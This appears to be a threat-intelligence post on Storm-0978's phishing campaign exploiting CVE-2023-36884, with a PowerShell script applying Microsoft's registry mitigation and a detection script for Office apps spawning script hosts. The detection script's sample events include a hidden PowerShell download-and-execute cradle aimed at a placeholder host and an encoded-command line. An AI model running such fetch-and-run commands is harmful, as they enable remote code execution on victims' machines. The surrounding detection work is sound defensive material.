Microsoft has attributed a series of targeted intrusions to a threat actor it tracks as Storm-0978. The group pursues both financial and espionage objectives, and its primary entry point is a carefully built phishing campaign. The targets are organizations worldwide, including government institutions and entities in the financial sector.

The Threat Actor: Storm-0978

Storm-0978 is a threat actor with both financial and espionage motives; the Storm- prefix is Microsoft's designation for an activity cluster that has not yet been merged into a named group. The group's signature implant is the RomCom backdoor (other vendors track the actor under that same name), delivered through phishing documents. Once installed, the backdoor gives the operators remote access to the host, which they use to steal sensitive information in espionage operations and, in financially motivated intrusions, to stage ransomware that disrupts operations.

Insights from CrowdStrike

The CrowdStrike 2023 Global Threat Report gives the wider context in which actors like Storm-0978 operate. In 2022, CrowdStrike tracked more than 200 named adversaries and recorded a 95% increase in cloud exploitation and a 112% increase in access broker advertisements on the criminal underground.

Access brokers acquire credentials and footholds in organizations and then provide or sell that access to other actors, including ransomware operators. Their growth is one reason identity-based detection matters so much: a purchased login looks like a legitimate user until its behaviour is examined.

The report also notes the increasing speed and sophistication of adversaries and the growing pressure on cloud environments. The average eCrime breakout time (from initial foothold to lateral movement) was 84 minutes, and 71% of the attacks detected were malware-free, meaning they relied on valid credentials, built-in tools and hands-on-keyboard activity rather than dropped binaries.

The Vulnerability: CVE-2023-36884

The Storm-0978 campaign exploited CVE-2023-36884, which Microsoft's July 2023 advisory described as an Office and Windows HTML remote code execution vulnerability. At the time of that advisory Microsoft was still investigating, had no patch available, and confirmed it was aware of targeted attacks exploiting the flaw.

An attacker crafts a Microsoft Office document that, when opened, executes code in the context of the victim user. The victim has to be convinced to open the file, which is why the exploit was delivered through phishing rather than used as a remote, unauthenticated attack. Microsoft's advisory stated that a fix would come either through the monthly release process or as an out-of-cycle update, and in the interim it published a registry-based mitigation (the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION feature control for the affected Office executables) and noted that Microsoft Defender for Office 365 and the attack surface reduction rule "Block all Office applications from creating child processes" blocked the observed attack chain. Microsoft shipped a fix in the August 2023 security updates.
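The interim mitigation Microsoft published with the July 2023 advisory was a feature-control registry key that blocks cross-protocol file navigation in the listed Office executables. The script below applies and then verifies that key; it is an added example written for this page, not Microsoft's own tooling. The key path and the nine executable names are the ones from the advisory; the two function names are this example's own. Run it from an elevated PowerShell session.

```powershell
# Added example for this page: apply and verify the registry mitigation that
# Microsoft published for CVE-2023-36884 before a patch was available.
# Key path and executable names come from Microsoft's advisory; the function
# names are this example's own. Requires an elevated session.

$KeyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION'

# Executables named in the advisory; each gets a REG_DWORD value of 1.
$OfficeApps = @(
    'Excel.exe', 'Graph.exe', 'MSAccess.exe', 'MSPub.exe', 'PowerPoint.exe',
    'Visio.exe', 'WinProj.exe', 'WinWord.exe', 'Wordpad.exe'
)

function Set-CrossProtocolNavigationBlock {
    # Creates the feature-control key if it does not exist and sets a DWORD of 1
    # named after each executable.
    param([string[]]$Apps = $OfficeApps)

    if (-not (Test-Path -Path $KeyPath)) {
        New-Item -Path $KeyPath -Force | Out-Null
    }
    foreach ($app in $Apps) {
        New-ItemProperty -Path $KeyPath -Name $app -PropertyType DWord -Value 1 -Force | Out-Null
    }
}

function Test-CrossProtocolNavigationBlock {
    # Returns the executables that are NOT yet covered; an empty array means
    # the mitigation is fully in place.
    param([string[]]$Apps = $OfficeApps)

    $missing = foreach ($app in $Apps) {
        # Suppress the error for a missing key or value so the result is simply $null.
        $value = (Get-ItemProperty -Path $KeyPath -Name $app -ErrorAction SilentlyContinue).$app
        if ($value -ne 1) { $app }
    }
    return @($missing)
}

Set-CrossProtocolNavigationBlock
$gaps = Test-CrossProtocolNavigationBlock
if ($gaps.Count -eq 0) {
    Write-Output 'CVE-2023-36884 mitigation present for all listed Office executables.'
} else {
    Write-Output "Mitigation missing for: $($gaps -join ', ')"
}
```

Two caveats from the advisory apply: Microsoft warned that this key can affect regular functionality in some scenarios, so test it before deploying fleet-wide, and it is no longer needed once the August 2023 security updates are installed. A Group Policy preference targeting the same HKLM path is the usual way to push it at scale.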

For the vendor advisory, CVSS scoring and patch references, consult the National Vulnerability Database (NVD) entry for CVE-2023-36884.

MITRE ATT&CK TTPs

  • Initial Access: Phishing (T1566), here as spearphishing with a malicious attachment or link (T1566.001 / T1566.002). Storm-0978 sends emails that appear to come from trusted sources and carry an Office document that triggers CVE-2023-36884 when the victim opens it.
  • Execution: Command and Scripting Interpreter: PowerShell (T1059.001). PowerShell, Microsoft's task automation and configuration management framework, is a common choice because it is present on every Windows host and can fetch and run code in memory without touching disk.
  • Command and Control: Application Layer Protocol (T1071), typically HTTP or HTTPS, so that beaconing from compromised hosts blends in with ordinary web traffic.
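The chain above produces a recognisable host signal: an Office application spawning a script host. The script below is an added example for this page (not from Microsoft or any vendor) that runs such a check over constructed process-creation records shaped like Sysmon Event ID 1 or Security Event ID 4688 data. The field names (ParentImage, Image, CommandLine, Computer) and the sample events are this example's assumptions; example.invalid is a reserved, non-resolving domain, and the short base64 blob decodes to the harmless string IEX.

```powershell
# Added example for this page: flag Office applications spawning a script host,
# the hand-off from a T1566 document lure to T1059.001 execution. The events
# below are constructed to resemble process-creation telemetry; the field
# names are this example's assumptions, not a vendor schema.

$OfficeParents = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe', 'mspub.exe', 'visio.exe')
$ScriptHosts   = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'rundll32.exe')

# Constructed sample events: one Word -> PowerShell download cradle, one benign
# Explorer -> Notepad, one Excel -> cmd -> encoded PowerShell, and one benign
# Word -> print-spooler helper that must NOT be flagged.
$SampleEvents = @(
    [pscustomobject]@{
        Time = '2023-07-11T09:14:02Z'; Computer = 'WS-042'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/s.ps1'')"'
    },
    [pscustomobject]@{
        Time = '2023-07-11T09:14:05Z'; Computer = 'WS-042'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe C:\Users\jdoe\report.txt'
    },
    [pscustomobject]@{
        Time = '2023-07-11T09:20:41Z'; Computer = 'WS-017'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c powershell -enc SQBFAFgA'
    },
    [pscustomobject]@{
        Time = '2023-07-11T09:22:10Z'; Computer = 'WS-017'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\splwow64.exe'
        CommandLine = 'C:\Windows\splwow64.exe 12288'
    }
)

function Find-OfficeSpawnedScriptHost {
    # Emits one finding per event whose parent is an Office app and whose child
    # is a script host, annotated with the command-line traits to triage first.
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $parent = [System.IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()
        $child  = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        if (($OfficeParents -notcontains $parent) -or ($ScriptHosts -notcontains $child)) { continue }

        # -match is case-insensitive in PowerShell by default.
        $traits = @()
        if ($e.CommandLine -match '(^|\s)-(e|ec|enc|encodedcommand)\s') { $traits += 'encoded command' }
        if ($e.CommandLine -match '-w(indowstyle)?\s+hidden')          { $traits += 'hidden window' }
        if ($e.CommandLine -match '-(nop|noprofile)(\s|$)')            { $traits += 'no profile' }
        if ($e.CommandLine -match 'downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://') {
            $traits += 'network fetch (possible T1071 C2)'
        }

        # cmd.exe that immediately relaunches PowerShell is still T1059.001 in substance.
        $isPowerShell = ($child -in @('powershell.exe', 'pwsh.exe')) -or ($e.CommandLine -match 'powershell')
        $technique = if ($isPowerShell) { 'T1059.001' } else { 'T1059' }
        $traitText = if ($traits) { $traits -join ', ' } else { 'none' }

        [pscustomobject]@{
            Time        = $e.Time
            Computer    = $e.Computer
            Parent      = $parent
            Child       = $child
            Technique   = "T1566 -> $technique"
            Traits      = $traitText
            CommandLine = $e.CommandLine
        }
    }
}

# Expect two findings (WS-042 Word -> PowerShell, WS-017 Excel -> cmd); the
# Explorer and splwow64 events are ignored.
Find-OfficeSpawnedScriptHost -Events $SampleEvents | Format-List
```

To run this against live data, feed it records mapped from Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]' (Sysmon exposes ParentImage, Image and CommandLine directly in the event XML) or from Security Event ID 4688 with command-line auditing enabled. The same parent/child relationship is what the attack surface reduction rule "Block all Office applications from creating child processes" prevents, so this detection is the monitoring counterpart to that control where the rule cannot be enforced.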

Further Reading

To gain a deeper understanding of the Storm-0978 attacks and the broader cybersecurity landscape, consider exploring the following resources:

  1. CrowdStrike 2023 Global Threat Report: This comprehensive report provides insights into the latest trends in cyber threats, including the activities of over 200 adversaries and the increasing threat to cloud environments.
  2. Microsoft Security Blog: Microsoft’s official security blog offers a wealth of information on various cybersecurity topics, including detailed analyses of recent attacks and vulnerabilities.